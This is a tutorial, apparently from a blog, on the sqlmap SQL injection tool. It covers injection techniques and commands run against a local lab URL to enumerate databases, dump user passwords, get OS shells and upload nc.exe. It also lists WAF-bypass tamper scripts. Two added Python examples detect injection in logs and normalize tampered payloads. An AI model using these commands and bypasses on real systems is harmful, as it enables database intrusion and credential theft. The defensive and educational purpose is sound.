sqlmap in detail

sqlmap is an automated SQL injection tool. Its main function is to scan for, find and exploit SQL injection vulnerabilities in a given URL. It comes with many built-in bypass plug-ins (tamper scripts) and supports the databases MySQL, Oracle, PostgreSQL, Microsoft SQL Server, Microsoft Access, IBM DB2, SQLite, Firebird, Sybase and SAP MaxDB.
sqlmap supports five different injection techniques:

  • 1 Boolean-based blind: whether a condition is true or false is determined from the content of the page returned by the injected request;
  • 2 time-based blind: no information can be determined from the page content, so whether the injected statement executed is inferred from a conditional delay (the page's response time increases);
  • 3 error-based: the page returns an error message, or the result of the injected statement is returned directly in the page;
  • 4 UNION query: injection where UNION can be used;
  • 5 stacked queries: injection where multiple statements can be executed at once.
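Each of the five techniques above leaves a different trace in a web server's access log. The following Python is an added example, not part of the original post: it pulls query-string parameters out of constructed access-log lines against the same "/sql/Less-1/?id=" endpoint the post uses and labels them with the technique whose signature they match. The log lines and regular expressions are constructed for illustration, not a complete rule set.

```python
import re
from urllib.parse import unquote_plus, urlsplit

# Constructed access-log lines (not from the original post) against the
# sqli-labs style "/sql/Less-1/?id=" endpoint used throughout the post.
SAMPLE_LOG = """\
10.0.0.5 - - [01/Jan/2024:10:00:01 +0000] "GET /sql/Less-1/?id=1 HTTP/1.1" 200 512
10.0.0.5 - - [01/Jan/2024:10:00:02 +0000] "GET /sql/Less-1/?id=1%27%20AND%201%3D1%20--%20- HTTP/1.1" 200 512
10.0.0.5 - - [01/Jan/2024:10:00:03 +0000] "GET /sql/Less-1/?id=1%27%20AND%20SLEEP(5)%20--%20- HTTP/1.1" 200 512
10.0.0.5 - - [01/Jan/2024:10:00:04 +0000] "GET /sql/Less-1/?id=1%27%20AND%20extractvalue(1,version())%20--%20- HTTP/1.1" 500 80
10.0.0.5 - - [01/Jan/2024:10:00:05 +0000] "GET /sql/Less-1/?id=-1%27%20UNION%20SELECT%201,2,3%20--%20- HTTP/1.1" 200 600
10.0.0.5 - - [01/Jan/2024:10:00:06 +0000] "GET /sql/Less-1/?id=1%27;%20WAITFOR%20DELAY%20%270:0:5%27%20--%20- HTTP/1.1" 200 512
"""

REQUEST_RE = re.compile(r'"(?P<method>[A-Z]+) (?P<target>\S+) HTTP/')

# One illustrative signature per technique: stacked queries key on a ';' that
# starts a second statement, the others on the functions or operators each
# technique relies on. A value may match more than one technique.
TECHNIQUE_SIGNATURES = [
    ("stacked queries", re.compile(r";\s*(select|insert|update|delete|drop|exec|waitfor)\b", re.I)),
    ("time-based blind", re.compile(r"\b(sleep|benchmark|pg_sleep)\s*\(|\bwaitfor\s+delay\b", re.I)),
    ("error-based", re.compile(r"\b(extractvalue|updatexml)\s*\(", re.I)),
    ("UNION query", re.compile(r"\bunion\b(\s+all)?\s+select\b", re.I)),
    ("boolean-based blind", re.compile(r"\b(and|or)\s+['\"]?\w+['\"]?\s*(=|<|>|like)\s*['\"]?\w+", re.I)),
]

def classify(value):
    """Return the technique labels whose signature matches a decoded parameter value."""
    return [name for name, rx in TECHNIQUE_SIGNATURES if rx.search(value)]

def scan_log(text):
    """Return (param, decoded value, techniques) for every suspicious query parameter."""
    findings = []
    for line in text.splitlines():
        m = REQUEST_RE.search(line)
        if not m:
            continue
        query = urlsplit(m.group("target")).query
        for pair in query.split("&"):           # split by hand so ';' stays inside the value
            name, _, value = pair.partition("=")
            value = unquote_plus(value)         # decode %XX and '+' before matching
            techniques = classify(value)
            if techniques:
                findings.append((name, value, techniques))
    return findings

if __name__ == "__main__":
    for param, value, techniques in scan_log(SAMPLE_LOG):
        print(f"{param}={value!r}: {', '.join(techniques)}")
```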

1. Install sqlmap

  • Download and installation: https://github.com/sqlmapproject/sqlmap

2. Getting started with sqlmap

1. Determine whether injection exists
sqlmap.py -u http://127.0.0.1/sql/Less-1/?id=1
sqlmap.py -u "http://127.0.0.1/sql/Less-1/?id=1&uid=2"  # use double quotes when there is more than one parameter

2. Determine whether the request saved in a text file is injectable
sqlmap.py -r test.txt  # -r is generally used when cookie injection is present

3. List all databases of the current user
sqlmap.py -u http://127.0.0.1/sql/Less-1/?id=1 --dbs

4. Get the table names in a database
sqlmap.py -u http://127.0.0.1/sql/Less-1/?id=1 -D security --tables

5. Get the column names of a table
sqlmap.py -u http://127.0.0.1/sql/Less-1/?id=1 -D security -T users --columns

6. Get the column contents
sqlmap.py -u http://127.0.0.1/sql/Less-1/?id=1 -D security -T users -C username,password --dump

7. Get all database users
sqlmap.py -u http://127.0.0.1/sql/Less-1/?id=1 --users

8. Get the database users' passwords (hashes)
sqlmap.py -u http://127.0.0.1/sql/Less-1/?id=1 --passwords

9. Get the name of the current site database
sqlmap.py -u http://127.0.0.1/sql/Less-1/?id=1 --current-db

10. Get the user name of the current site database
sqlmap.py -u http://127.0.0.1/sql/Less-1/?id=1 --current-user

3. sqlmap advanced: parameter explanation

1. --level=5: detection level, 1-5, default 1. The higher the level, the more payloads are sent and the slower the scan. HTTP Cookie headers are tested from level 2; HTTP User-Agent/Referer headers are tested from level 3.

2. --is-dba: whether the current user has DBA privileges

3. --roles: list database administrator roles; only applies when the current database is Oracle

4. --referer=https://www.baidu.com: sqlmap can forge the HTTP Referer in its requests; when --level is set to 3 or higher it will also attempt Referer injection

5. --sql-shell: run custom SQL statements

6. --os-cmd, --os-shell: run arbitrary operating system commands

7. --file-read "C:/example.exe": read a file from the database server

8. sqlmap.py -u URL --file-write "/software/nc.exe" --file-dest "C:/WINDOWS/Temp/nc.exe": upload a file to the database server

4. sqlmap's built-in bypass (tamper) scripts explained

--identify-waf checks whether the site has protection in place (WAF/IDS/IPS).
--tamper modifies the data sent in order to bypass WAFs and similar devices; most tamper scripts use regular expressions to substitute characters in, or encode, the attack payload so that the WAF's detection rules no longer match.
Command: sqlmap.py -u "URL" --tamper "module name"
The official project currently provides 53 bypass scripts, for example:

apostrophemask.py # replaces the single quote with its UTF-8 full-width counterpart, for bypassing single-quote filters
base64encode.py # Base64-encodes the whole payload
multiplespaces.py # adds multiple spaces around SQL keywords
space2plus.py # replaces spaces with +
nonrecursivereplacement.py # doubles SQL keywords so that a single, non-recursive replacement of predefined keywords leaves a keyword intact (for very weak custom filters, e.g. ones that replace select with an empty string)
space2randomblank.py # replaces spaces with another valid blank character
unionalltounion.py # replaces UNION ALL SELECT with UNION SELECT
securesphere.py # appends a specially crafted string
space2hash.py # replaces spaces with a # followed by a random string and a line break (MySQL)
space2mssqlblank.py # replaces spaces with another blank character (MSSQL)
space2mssqlhash.py # replaces spaces with a # followed by a line break
between.py # replaces the greater-than sign with NOT BETWEEN 0 AND, and the equals sign with BETWEEN ... AND ...
percentage.py # adds a % in front of each character (ASP allows this)
sp_password.py # appends sp_password to the end of the payload so the DBMS automatically obfuscates it in its logs (MSSQL)
charencode.py # URL-encodes every character of the payload (already encoded characters are not processed)
randomcase.py # randomizes the case of keyword characters
charunicodeencode.py # Unicode-URL-encodes the string
space2comment.py # replaces spaces with /**/
equaltolike.py # replaces the equals sign with LIKE
greatest.py # bypasses filtering of >, replacing the greater-than sign with GREATEST
ifnull2ifisnull.py # bypasses IFNULL filtering, replacing IFNULL(A, B) with IF(ISNULL(A), B, A)
modsecurityversioned.py # gets past space filtering by wrapping the whole query in a MySQL versioned comment
space2mysqlblank.py # replaces spaces with other blank characters (MySQL)
modsecurityzeroversioned.py # injects using a MySQL zero-versioned inline comment (/*!00000 */)
space2mysqldash.py # replaces spaces with -- followed by a line break
bluecoat.py # replaces spaces after SQL keywords with a valid random blank character, then replaces the equals sign with LIKE
versionedkeywords.py # encloses keywords in MySQL versioned comments to bypass filters
halfversionedmorekeywords.py # bypasses firewalls when the database is MySQL by adding a versioned comment before each keyword
space2morehash.py # replaces spaces with a # followed by a random string and a line break (MySQL >= 5.1.13)
apostrophenullencode.py # replaces the single quote with its illegal double Unicode counterpart (%00%27)
appendnullbyte.py # appends a NULL byte (%00) to the end of the payload
chardoubleencode.py # double URL-encodes every character of the payload (already encoded characters are not processed)
unmagicquotes.py # replaces the single quote with the multi-byte combination %BF%27, together with a generic comment at the end
randomcomments.py # splits SQL keywords with /**/
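The reason these scripts work is that many WAF rules match the raw request text. As an added example that is not part of the original post, the following Python builds hand-written variants of one payload mirroring several of the tamper scripts above (the strings are constructed to imitate each script, not produced by running sqlmap) and compares a naive rule with one that first URL-decodes, strips comments and normalizes whitespace and case.

```python
import re
from urllib.parse import unquote_plus

# Constructed imitations of what the named tamper scripts do to one payload.
TAMPERED = {
    "plain":                     "1 UNION SELECT 1,2",
    "space2comment":             "1/**/UNION/**/SELECT/**/1,2",
    "randomcase":                "1 uNiOn SeLeCt 1,2",
    "multiplespaces":            "1    UNION      SELECT   1,2",
    "space2plus":                "1+UNION+SELECT+1,2",
    "space2randomblank":         "1%09UNION%0BSELECT%091,2",
    "space2hash":                "1%23Xy7%0AUNION%23qZ%0ASELECT%23k2%0A1,2",
    "space2mysqldash":           "1--%0AUNION--%0ASELECT--%0A1,2",
    "charencode":                "%31%20%55%4E%49%4F%4E%20%53%45%4C%45%43%54%20%31%2C%32",
    "chardoubleencode":          "%2531%2520%2555%254E%2549%254F%254E%2520%2553%2545%254C%2545%2543%2554%2520%2531%252C%2532",
    "versionedkeywords":         "1 /*!UNION*/ /*!SELECT*/ 1,2",
    "halfversionedmorekeywords": "1 /*!0UNION /*!0SELECT 1,2",
}

NAIVE_RULE = re.compile(r"UNION\s+SELECT")          # applied to the raw request text
NORMALIZED_RULE = re.compile(r"\bunion\s+select\b")  # applied after normalize()

def normalize(raw, max_rounds=3):
    """Undo the encodings and comment tricks above so one rule sees the real SQL."""
    s = raw
    for _ in range(max_rounds):              # bounded loop defeats double URL encoding
        decoded = unquote_plus(s)            # also turns '+' back into a space
        if decoded == s:
            break
        s = decoded
    s = re.sub(r"/\*!\d*", " ", s)           # opener of MySQL versioned comments
    s = re.sub(r"/\*.*?\*/", " ", s, flags=re.S)  # ordinary /**/ comments act as blanks
    s = s.replace("*/", " ")                 # closers left over from versioned comments
    s = re.sub(r"(#|--)[^\n]*\n", " ", s)    # '#...' and '--...' comments ending in a newline
    s = re.sub(r"\s+", " ", s)               # tabs, VT, newlines and space runs
    return s.strip().lower()

def evaluate(samples):
    """Return {variant: (naive rule hit, normalized rule hit)} for each sample."""
    return {name: (bool(NAIVE_RULE.search(raw)),
                   bool(NORMALIZED_RULE.search(normalize(raw))))
            for name, raw in samples.items()}

if __name__ == "__main__":
    for name, (naive, normalized) in evaluate(TAMPERED).items():
        print(f"{name:28s} naive={naive!s:5s} normalized={normalized}")
```

Normalizing before matching is what lets one rule hold across encodings; the tamper scripts that rewrite operators (between.py, equaltolike.py, greatest.py) need rules written against the SQL semantics rather than the literal characters.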


Source: www.cnblogs.com/zhengna/p/12119143.html